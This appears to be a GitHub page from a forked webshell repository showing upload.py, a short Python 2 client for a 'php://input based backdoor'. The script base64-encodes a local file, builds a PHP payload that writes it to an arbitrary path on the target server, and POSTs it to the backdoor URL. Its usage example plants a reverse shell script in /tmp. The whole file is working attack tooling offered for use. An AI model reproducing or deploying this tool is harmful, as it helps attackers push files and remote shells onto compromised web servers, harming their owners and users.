forked from tennc/webshell
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathupload.py
34 lines (29 loc) · 964 Bytes
/
upload.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#!/usr/bin/python
# Upload.py
# File Upload client for the php://input based backdoor
# Website: insecurety.net
# Author: infodox
# Twatter: @info_dox
# Insecurety Research - 2013
# version: 0.2a
import requests
import sys
if (len(sys.argv) != 4):
print "Usage: " + sys.argv[0] + " <url of backdoor> <localfile> <remotefile>"
print "Example: " + sys.argv[0] + " http://localhost/odd.php reverseshell.py /tmp/rsh.py"
sys.exit(0)
url = sys.argv[1]
localfile = sys.argv[2]
remotefile = sys.argv[3]
f = open(localfile, "r")
rawfiledata = f.read()
encodedfiledata = rawfiledata.encode('base64')
phppayload = """<?php
$f = fopen("%s", "a");
$x = base64_decode('%s');
fwrite($f, "$x");
fclose($f);
?>""" %(remotefile, encodedfiledata) # I need to add a hashing function sometime for corruption test.
print "[+] Uploading File"
requests.post(url, phppayload) # this is why I love the python requests library
print "[+] Upload should be complete"